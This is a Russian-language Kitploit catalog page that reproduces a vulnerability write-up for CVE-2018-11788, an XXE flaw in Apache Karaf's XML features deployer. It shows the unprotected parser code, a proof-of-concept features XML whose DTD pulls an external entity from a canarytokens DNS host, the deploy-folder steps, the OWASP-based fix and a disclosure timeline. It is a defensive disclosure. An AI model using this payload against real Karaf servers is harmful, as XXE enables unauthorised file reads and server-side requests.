Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2018-11788 — Apache Karaf XXE Vulnerability (CVE-2018-11788) | Kitploit
Инструменты/GitHubGitHub/brianwrf/cve-2018-11788
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationPapers & ResearchLearning & Education
GitHubbrianwrf/cve-2018-11788

CVE-2018-11788

Apache Karaf XXE Vulnerability (CVE-2018-11788)

Репозиторий
3767 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Краткое описание

Apache Karaf — это современный и полиморфный контейнер приложений. Это легкий, производительный и готовый к корпоративному использованию контейнер на базе OSGi. Apache Karaf — это «продуктовый проект», предоставляющий полную и готовую к использованию среду выполнения. Среда выполнения является «многогранной», что означает возможность развертывания различных типов приложений: OSGi и не OSGi, веб-приложений, сервис-ориентированных и т.д.

В ходе недавнего исследования Apache Karaf я обнаружил несколько уязвимостей XXE (внедрение внешних XML-сущностей) в его XML-парсерах. Причина в том, что парсеры некорректно обрабатывают XML-документы.

Затронутые версии

  • Apache Karaf <= 4.2.1
  • Apache Karaf <= 4.1.6

Анализ

Согласно официальной документации, Apache Karaf по умолчанию предоставляет развертыватель (deployer) для features, который позволяет пользователям выполнять «горячее развертывание» XML-файла features, помещая его непосредственно в папку deploy.

Когда вы помещаете XML-файл features в папку deploy, развертыватель выполняет следующие действия:

  • регистрирует этот XML-файл как репозиторий features;
  • features с атрибутом install, установленным в "auto", будут автоматически установлены развертывателем.

Например, поместив следующий XML в папку deploy, вы автоматически установите feature1 и feature2, в то время как feature3 установлен не будет:

root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<features name="my-features" xmlns="http://karaf.apache.org/xmlns/features/v1.3.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xsi:schemaLocation="http://karaf.apache.org/xmlns/features/v1.3.0 http://karaf.apache.org/xmlns/features/v1.3.0">

    <feature name="feature1" version="1.0" install="auto">
        ...
    </feature>

    <feature name="feature2" version="1.0" install="auto">
        ...
    </feature>

    <feature name="feature3" version="1.0">
        ...
    </feature>

</features>

Чтобы понять, как развертыватель обрабатывает XML-файл, я проверил исходный код Karaf на Github и обнаружил следующие вызовы:

  • Класс Activator вызывает функцию doStart() для запуска слушателя развертывателя.
  • Функция doStart() вызывает FeatureDeploymentListener.init() для инициализации слушателя.
  • Затем она вызывает функцию bundleChanged - canHandle - getRootElementName для разбора XML-документа с помощью XMLInputFactory.

Однако при дальнейшем изучении функции getRootElementName, приведенной ниже, не было обнаружено никаких средств защиты от XXE.

root@kitploit:~
private QName getRootElementName(File artifact) throws Exception {
    if (xif == null) {
        xif = XMLInputFactory.newFactory();
        xif.setProperty(XMLInputFactory.IS_NAMESPACE_AWARE, true);
    }
    try (InputStream is = new FileInputStream(artifact)) {
        XMLStreamReader sr = xif.createXMLStreamReader(is);
        sr.nextTag();
        return sr.getName();
    }
}

Поэтому я предположил, что это представляет потенциальную угрозу безопасности для Apache Karaf.

Подтверждение концепции

Чтобы проверить моё предположение, я протестировал последний официальный релиз Apache Karaf 4.2.0, загруженный с https://karaf.apache.org/download.html, следующим образом.

  1. Загрузите бинарный дистрибутив с Apache Karaf 4.2.0
  2. Распакуйте пакет и перейдите в папку bin, чтобы запустить консоль Karaf, как показано ниже
root@kitploit:~
  bin$ ./karaf
          __ __                  ____      
         / //_/____ __________ _/ __/      
        / ,<  / __ `/ ___/ __ `/ /_        
       / /| |/ /_/ / /  / /_/ / __/        
      /_/ |_|\__,_/_/   \__,_/_/         

    Apache Karaf (4.2.0)

  Hit '<tab>' for a list of available commands
  and '[cmd] --help' for help on a specific command.
  Hit '<ctrl-d>' or type 'system:shutdown' or 'logout' to shutdown Karaf.

  karaf@root()>
  1. Сгенерируйте DNS-токен на https://canarytokens.org/generate, например 27av6zyg33g8q8xu338uvhnsc.canarytokens.com
  2. Создайте XML-файл и добавьте внешнюю сущность с сгенерированным DNS-токеном, встроенным в DTD, как показано ниже:
root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://27av6zyg33g8q8xu338uvhnsc.canarytokens.com"> %dtd;]
<features name="my-features" xmlns="http://karaf.apache.org/xmlns/features/v1.3.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xsi:schemaLocation="http://karaf.apache.org/xmlns/features/v1.3.0 http://karaf.apache.org/xmlns/features/v1.3.0">
    <feature name="deployer" version="2.0" install="auto">
    </feature>
</features>
  1. Скопируйте созданный XML-файл в папку deploy
root@kitploit:~
apache-karaf-4.2.0$ cd deploy/
deploy$ tree
.
├── README
└── poc.xml
  1. Подождите некоторое время, и вы увидите DNS-запросы с вашей тестовой машины, что означает, что XML-парсер пытается загрузить внешние сущности, встроенные в DTD.

Устранение уязвимости

Следуйте рекомендациям OWASP ниже, которые содержат краткую информацию по предотвращению данной уязвимости. https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet#Java

Например, добавьте следующий код для отключения DTD и внешних сущностей в функции getRootElementName.

root@kitploit:~
xif.setProperty(XMLInputFactory.SUPPORT_DTD, false); // Это полностью отключает DTD для этой фабрики
xif.setProperty("javax.xml.stream.isSupportingExternalEntities", false); // отключает внешние сущности

Дополнительная информация

Помимо вышеупомянутой находки, я также обнаружил, что другой класс XmlUtils в проекте Apache Karaf не добавляет никакой защиты от уязвимости XXE при разборе XML-документов.

root@kitploit:~
package org.apache.karaf.util;

import java.io.File;
import java.io.IOException;
import java.io.InputStream;

import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import javax.xml.parsers.SAXParserFactory;
import javax.xml.transform.Result;
import javax.xml.transform.Source;
import javax.xml.transform.Transformer;
import javax.xml.transform.TransformerConfigurationException;
import javax.xml.transform.TransformerException;
import javax.xml.transform.TransformerFactory;

import org.w3c.dom.Document;
import org.xml.sax.ErrorHandler;
import org.xml.sax.SAXException;
import org.xml.sax.XMLReader;

/**
 * Utils class to manipulate XML document in a thread safe way.
 */
public class XmlUtils {

    private static final ThreadLocal<DocumentBuilderFactory> DOCUMENT_BUILDER_FACTORY = new ThreadLocal<>();
    private static final ThreadLocal<TransformerFactory> TRANSFORMER_FACTORY = new ThreadLocal<>();
    private static final ThreadLocal<SAXParserFactory> SAX_PARSER_FACTORY = new ThreadLocal<>();

    public static Document parse(String uri) throws TransformerException, IOException, SAXException, ParserConfigurationException {
        DocumentBuilder db = documentBuilder();
        try {
            return db.parse(uri);
        } finally {
            db.reset();
        }
    }

    public static Document parse(InputStream stream) throws TransformerException, IOException, SAXException, ParserConfigurationException {
        DocumentBuilder db = documentBuilder();
        try {
            return db.parse(stream);
        } finally {
            db.reset();
        }
    }

    public static Document parse(File f) throws TransformerException, IOException, SAXException, ParserConfigurationException {
        DocumentBuilder db = documentBuilder();
        try {
            return db.parse(f);
        } finally {
            db.reset();
        }
    }

    public static Document parse(File f, ErrorHandler errorHandler) throws TransformerException, IOException, SAXException, ParserConfigurationException {
        DocumentBuilder db = documentBuilder();
        db.setErrorHandler(errorHandler);
        try {
            return db.parse(f);
        } finally {
            db.reset();
        }
    }

    public static void transform(Source xmlSource, Result outputTarget) throws TransformerException {
        Transformer t = transformer();
        try {
            t.transform(xmlSource, outputTarget);
        } finally {
            t.reset();
        }
    }

    public static void transform(Source xsltSource, Source xmlSource, Result outputTarget) throws TransformerException {
        Transformer t = transformer(xsltSource);
        try {
            t.transform(xmlSource, outputTarget);
        } finally {
            t.reset();
        }
    }

    public static XMLReader xmlReader() throws ParserConfigurationException, SAXException {
        SAXParserFactory spf = SAX_PARSER_FACTORY.get();
        if (spf == null) {
            spf = SAXParserFactory.newInstance();
            spf.setNamespaceAware(true);
            SAX_PARSER_FACTORY.set(spf);
        }
        return spf.newSAXParser().getXMLReader();
    }

    public static DocumentBuilder documentBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory dbf = DOCUMENT_BUILDER_FACTORY.get();
        if (dbf == null) {
            dbf = DocumentBuilderFactory.newInstance();
            dbf.setNamespaceAware(true);
            DOCUMENT_BUILDER_FACTORY.set(dbf);
        }
        return dbf.newDocumentBuilder();
    }

    public static Transformer transformer() throws TransformerConfigurationException {
        TransformerFactory tf = TRANSFORMER_FACTORY.get();
        if (tf == null) {
            tf = TransformerFactory.newInstance();
            TRANSFORMER_FACTORY.set(tf);
        }
        return tf.newTransformer();
    }

    private static Transformer transformer(Source xsltSource) throws TransformerConfigurationException {
        TransformerFactory tf = TRANSFORMER_FACTORY.get();
        if (tf == null) {
            tf = TransformerFactory.newInstance();
            TRANSFORMER_FACTORY.set(tf);
        }
        return tf.newTransformer(xsltSource);
    }

}

Хронология

  • 2018-08-22: Сообщил о проблеме команде безопасности Apache.
  • 2018-09-26: Команда Apache Karaf подтвердила и исправила проблему в KARAF-5911.
  • 2018-11-30: Выпущен Apache Karaf 4.1.7 с исправлением.
  • 2018-12-18: Выпущен Apache Karaf 4.2.2 с исправлением.
  • 2019-01-06: Apache Karaf объявил CVE-2018-11788 по этой проблеме.

Ссылки

  • https://karaf.apache.org/security/cve-2018-11788.txt
  • https://issues.apache.org/jira/browse/KARAF-5911
  • https://gitbox.apache.org/repos/asf?p=karaf.git;h=cc3332e
  • https://gitbox.apache.org/repos/asf?p=karaf.git;h=1ffa6d1
  • http://avfisher.win/archives/1052
Скачать инструмент